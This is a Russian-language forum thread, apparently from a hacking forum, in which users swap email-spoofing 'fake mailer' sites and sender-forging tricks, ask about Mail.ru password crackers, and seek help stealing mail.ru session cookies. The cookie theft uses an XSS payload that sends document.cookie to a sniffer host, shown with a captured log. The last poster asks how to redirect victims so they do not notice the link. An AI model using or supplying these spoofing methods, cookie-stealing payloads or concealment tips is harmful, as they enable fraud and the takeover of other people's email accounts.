Я люблю тебя mail: Вопросы и ответы

мой тебе совет- региш хостинг ну например на http://ueuo.com/ закидываеш скрипт что я скинул- пользуешся и у тебя полная уверенность что логи сохраняються только на ТВОЕМ хосте (а не наизвестных- это насчет приватности переписки)

 

Я так понял этот сайт хостер уже прикрыл... Решил для себя запустить такой же. Скачал на днях исходники ресурса email.rl6.ru, залил на x10.bz хостинг. Все красиво и быстро отсылается, НО - после получения письма тема письма написанная кириллицей отображается знаками ???????????????? (хотя текст письма тоже кириличный отображается нормально). Подскажите пожалуйста где подправить исходники чтоб нормально отображалась кириллица в теме письма. Заранее спасибо!

P.S.: при использовании скрипта от NOmeR1 кириллица отображается везде корректно, но отсутствует возможность прикрепить файл.

 

дело в том, что с помощью Скрипт от NOmeR1 нельзя написать имя отправителя допустим BLA bla (можно только мыло указывать)
а с помощью http://daneil1024.hdd2.ru/fake-mailer/ можно было
еще можно воспользоваться http://parasiteeve.org.ru/mail.php но там бесит, то что нужно файл подкреплять, если этого не сделать, то приходить пустой файл (noname 0Кб) что и есть не хорошо. кто что предложит?

 

Пользуйтесь просто этим ресурсом для отправки,по сосбветнном опыту говорю,что это лучший из подобных ресурсов и хтмл свободно отправляется.

 

нет, там можно только указывать Отправителя, допустим нельзя сделать так:
отправил Admin, а при наводке курсором на admin показывается мыло admin'a
(вроде бы смог объяснить )

 

Эх вы))) двоешники)))) открою страшный секрет вот в таком формате пишеш от кого отправленно и посмотриш что получилось:
Admin<[email protected]>

 

об этом было мной подумано, но гадать было бессмысленно =)
нечеловеческое спасибо

 

спамер по агенту мэйл.ру возможно ли найти рабочий?

 

Пацаны,кто побывал прогу Mail.ru Pass Cracker 1.1,1.2,2.0? Для первой кейген есть а самой проги нет. Для второй ваще ничего нету. Последняя версия есть,а кряка,увы,нету. Много где читал,некоторые говорят реально,некоторые кидалово. Есть на форуме кто реально проверял? Хотя с трудом вериться что реально,но мало ли чудес на свете)

 

чудес на свете не бывает))) Когда-же вы повзрослеете и не будете уже искать крякер инета?))) НИОДИН емайл не ломается прогой (исключение брут (самый тупой способ)) грамотный взлом основанн на ошибках, допущенных при создании почтового сайта, все остальное СИ , еще раз повторяю- программы куда вбиваеш интересующий емайл и тебе выдает готовый пасс НЕ СУЩЕСТВУЕТ

 

А eсли СИ нe поможeт?т.e. Пaроль тупо зaбыт. И брут нe бeрёт, что дeлaть?) вопрос тупой конeчно, но свой ящик 2 годa пытaюсь сломaть

 

это на каком интересно сервере?

 

рамблер =(

 

Разве после двух лет он еще сам не уничтожился из-за бездействия.

 

рамблер вообще какашка божья

 

Установил себе Sniffer 4.1 Multi от Kanick. Начал тестировать, стало приходить: IP REFERER (ссылка с которой зашел чел) AGENT. Но вот данные QUERY оставались пустыми, т е куки не приходили.

Сначала отправил себе на почту ссылку в виде:
http://my*****.ru/nice/admin.gif?"+document.cookie;
зашел в лог посмотреть что там:

HTML:

Запрос с win.mail.ru  — 24.06.2010 23:45
IP: **.***.247.180 (whois)
QUERY: " document.cookie
REFERER: http://win.mail.ru/cgi-bin/readmsg?id=12774086980000000510
AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 WebMoney Advisor

Если просто:
http://my*****.ru/nice/admin.gif , то все тоже самое лишь QUERY чисто пустая.

Посмотрев много видео и прочитав много статей, решил попробовать как все авторы рекомендовали: создал abc.gif ну и abc.img и вписал туда скрипт:

HTML:

<script>
img=new Image(); img.src ="http://my*****.ru/nice/abc.gif?"+document.cookie;
</script>

Дальше как везде написано привязал к письму и отправил, однако даже при всем желании открыть в браузере эти файлы невозможно - сразу все идет на скачку, а gif, когда пытался просмотреть откликнулся ошибкой. Пытался всеми силами вложить эти файлы на mail.ru (мои файлы, мои фото), но ничего не вышло... Привязывал сразу к своему, но тогда получалось ровно то, что и в первом случае.

Может, кто знает, в чем проблема, может быть скрипт не так прописан, ссылку нужно по другому высылать.

 

первое , кража кук с помощью открытки не работает уже больше года
второе , чтобы украсть куки нужна пассивная XSS

 

А как она выглядит, как искать и как отредактировать ссылку, если знаешь это пасивную уязвимость, и что такое активная уязвимость. Пожалуйста сделайте краткий обзор. Ну и ссылки на темы, которые на ваш взгяд более полезны...

 

Кратко:
XSS - Cross Site Scripting (межсайтовый скриптинг)
Активные - внедрение исполняемого кода в страницу
Пассивные - внедрение исполняемого кода в запрос
исполняемый код выполняется на локальной машине и чаще всего это JavaScript

Невнимательно смотрел, примеры пассивных XSS есть в этом разделе - https://forum.antichat.ru/thread88986.html
Активки вряд ли найдешь в паблике.

 

Нашел уязвимость, нашел сниффер в онлайне, настроил работает, однако сервер иногда не доступен. Поставил себе сниффер Sniffer 4.1 Multi от Kanick, все отправляет, однако человек очень долго будет видеть палевную ссылку, до тех пор пока не закроет. Как настроить редирект, чтобы он переходил на другую ссылку, пытался забраться в "изображение gif", а там:
GIF89a


не понятно, где, что изменять... Может, кто знает выход?